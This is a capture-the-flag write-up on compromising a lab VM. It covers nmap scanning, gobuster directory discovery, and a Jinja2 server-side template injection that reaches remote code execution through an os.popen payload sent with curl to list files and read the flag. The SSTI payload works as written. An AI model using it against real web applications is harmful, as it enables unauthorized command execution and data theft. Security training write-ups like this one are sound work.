CTF Challenge Writeup: Flag 1
- This writeup details the process of capturing the first flag in the CTF challenge.
Pre-Enum
- Connect The Virtual Machine we got to the virtual box using
vboxmanage import CTF_VB.ovavboxmanage startvm "CTF 3" --type headlessInitial Enumeration
- When you’ll successfully connect your vm to the v-box you can , use
ip addr. Check this in two batches for no confusion. In my case , At First i saw 4 hosts and and after second time i see my VM Host up.
nmap -sn 192.168.1.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 20:57 IST │ │ Nmap scan report for 192.168.1.1 │ │ Host is up (0.016s latency). │ │ Nmap scan report for 192.168.1.2 │ │ Host is up (0.013s latency). │ │ Nmap scan report for LGwebOSTV (192.168.1.3) │ │ Host is up (0.016s latency). │ │ Nmap scan report for 192.168.1.4 │ │ Host is up (0.013s latency). │ │ Nmap scan report for 192.168.1.5 │ │ Host is up (0.013s latency). │ │ Nmap scan report for parrot (192.168.X.X) │ │ Host is up (0.00014s latency). │ │ Nmap scan report for 192.168.1.7 │ │ Host is up (0.00052s latency). │ │ Nmap done: 256 IP addresses (7 hosts up) scanned in 4.79 secondsnmap -sV -sC 192.168.1.7This Scan Revealed:
Shell nmap -sV -sC 192.168.1.7 (Run a faster nmap scan on the target IP address to find open ports and services on the most common ports.) │ │ │ │ Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 11:31 IST │ │ Nmap scan report for 192.168.1.7 │ │ Host is up (0.00014s latency). │ │ Not shown: 998 closed tcp ports (conn-refused) │ │ PORT STATE SERVICE VERSION │ │ 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0) │ │ | ssh-hostkey: │ │ | 256 e1:c6:00:a6:16:5b:78:82:cd:50:ae:35:57:03:84:41 (ECDSA) │ │ |_ 256 42:97:49:52:c9:da:ad:5a:e7:eb:f3:7b:e8:87:06:7f (ED25519) │ │ 5000/tcp open upnp? │ │ | fingerprint-strings: │ │ | GetRequest: │ │ | HTTP/1.1 200 OK │ │ | Server: Werkzeug/3.1.3 Python/3.11.2 │ │ | Date: Mon, 22 Sep 2025 06:01:43 GMT │ │ | Content-Disposition: inline; filename=index.html │ │ | Content-Type: text/html; charset=utf-8 │ │ | Content-Length: 3806 │ │ | Last-Modified: Sat, 13 Sep 2025 13:33:51 GMT │ │ | Cache-Control: no-cache │ │ | ETag: "1757770431.1740406-3806-3086748594" │ │ | Date: Mon, 22 Sep 2025 06:01:43 GMT │ │ | Connection: close │ │ | <!DOCTYPE html> │ │ | <html lang="en"> │ │ | <head> │ │ | <meta charset="UTF-8"> │ │ | <meta name="viewport" content="width=device-width, initial-scale=1.0"> │ │ | <title>R&D Portal</title> │ │ | <style> │ │ | body { │ │ | margin: 0; │ │ | font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; │ │ | background: #f4f7fb; │ │ | color: #333; │ │ | Navbar */ │ │ | .navbar { │ │ | display: flex; │ │ | justify-content: space-between; │ │ | align-items: center; │ │ | padding: 15px 40px; │ │ | background: #1e3c72; │ │ | background: linear-gra │ │ | RTSPRequest: │ │ | <!DOCTYPE HTML> │ │ | <html lang="en"> │ │ | <head> │ │ | <meta charset="utf-8"> │ │ | <title>Error response</title> │ │ | </head> │ │ | <body> │ │ | <h1>Error response</h1> │ │ | <p>Error code: 400</p> │ │ | <p>Message: Bad request version ('RTSP/1.0').</p> │ │ | <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p> │ │ | </body> │ │ |_ </html> │ │ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at │ │ https://nmap.org/cgi-bin/submit.cgi?new-service : │ │ SF-Port5000-TCP:V=7.94SVN%I=7%D=9/22%Time=68D0E647%P=x86_64-pc-linux-gnu%r │ │ SF:(GetRequest,1057,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.1\.3 │ │ SF:\x20Python/3\.11\.2\r\nDate:\x20Mon,\x2022\x20Sep\x202025\x2006:01:43\x │ │ SF:20GMT\r\nContent-Disposition:\x20inline;\x20filename=index\.html\r\nCon │ │ SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x203806\r\ │ │ SF:nLast-Modified:\x20Sat,\x2013\x20Sep\x202025\x2013:33:51\x20GMT\r\nCach │ │ SF:e-Control:\x20no-cache\r\nETag:\x20\"1757770431\.1740406-3806-308674859 │ │ SF:4\"\r\nDate:\x20Mon,\x2022\x20Sep\x202025\x2006:01:43\x20GMT\r\nConnect │ │ SF:ion:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\ │ │ SF:n\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20<meta\x20name=\"viewport\ │ │ SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20<t │ │ SF:itle>R&D\x20Portal</title>\n\x20\x20<style>\n\x20\x20\x20\x20body\x20{\ │ │ SF:n\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20font-fa │ │ SF:mily:\x20'Segoe\x20UI',\x20Tahoma,\x20Geneva,\x20Verdana,\x20sans-serif │ │ SF:;\n\x20\x20\x20\x20\x20\x20background:\x20#f4f7fb;\n\x20\x20\x20\x20\x2 │ │ SF:0\x20color:\x20#333;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20/\*\x20Navba │ │ SF:r\x20\*/\n\x20\x20\x20\x20\.navbar\x20{\n\x20\x20\x20\x20\x20\x20displa │ │ SF:y:\x20flex;\n\x20\x20\x20\x20\x20\x20justify-content:\x20space-between; │ │ SF:\n\x20\x20\x20\x20\x20\x20align-items:\x20center;\n\x20\x20\x20\x20\x20 │ │ SF:\x20padding:\x2015px\x2040px;\n\x20\x20\x20\x20\x20\x20background:\x20# │ │ SF:1e3c72;\n\x20\x20\x20\x20\x20\x20background:\x20linear-gra")%r(RTSPRequ │ │ SF:est,16C,"<!DOCTYPE\x20HTML>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<he │ │ SF:ad>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\ │ │ SF:x20\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x │ │ SF:20\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20 │ │ SF:<h1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x2 │ │ SF:0code:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x │ │ SF:20request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20 │ │ SF:\x20\x20<p>Error\x20code\x20explanation:\x20400\x20-\x20Bad\x20request\ │ │ SF:x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body> │ │ SF:\n</html>\n"); │ │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel │ │ │ │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . │ │ Nmap done: 1 IP address (1 host up) scanned in 95.35 seconds- Port 22/tcp: OpenSSH 9.2p1
- Port 5000/tcp: A Python-based web server using the Werkzeug framework.
Web Server Enumeration
-
The web server on port 5000 seemed like the most promising attack vector. I started by exploring the web application. The initial page was a simple “R&D Portal” with a non-functional search bar.
-
To discover hidden pages, I used the
gobustertool with thedirectory-list-2.3-medium.txtwordlist.
gobuster dir -u http://192.168.1.7:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt- This scan revealed a hidden directory:
/page.
SSTI Vulnerability Discovery
-
Navigating to
http://192.168.1.7:5000/pagerevealed a form asking for a name. The form submitted the name via a GET request to the same page. This is a common pattern for Server-Side Template Injection (SSTI) vulnerabilities. -
To test for SSTI, I submitted the following payload as the
nameparameter:
{{7*7}}- The server responded with “Hello 49!”, confirming the SSTI vulnerability. The template engine was executing the expression.
Remote Code Execution
- Since the server was identified as Python-based, I used a Jinja2 SSTI payload to attempt Remote Code Execution (RCE). I started by listing the files in the current directory using the
lscommand. - The payload was:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}- This was URL-encoded and sent via
curl:
curl "http://192.168.1.7:5000/page?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read()%20%7D%7D"Using this we can clearly see the results as:
Hello app.pyF14@_0n3.txtstaticFlag Discovery
- With RCE confirmed, I read the contents of the
F14@_0n3.txtfile using thecatcommand. - The payload was:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat F14@_0n3.txt').read() }}- This was URL-encoded and sent via
curl:
curl "http://192.168.1.7:5000/page?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__('os').popen('cat%20F14@_0n3.txt').read()%20%7D%7D"- The server responded with the flag:
jin@parrot ~/Desktop/indian army curl "http://192.168.1.10:5000/page?name=%7B%7B%20self.__init__.__globals__.__builtins__.__import__('os').popen('cat%20F14@_0n3.txt').read()%20%7D%7D"Hello FLAG -> S3Cur1ty_Br3@k_P@55ed!%- Thanks for the CTF! 🚩
- Please keep organizing with better practices.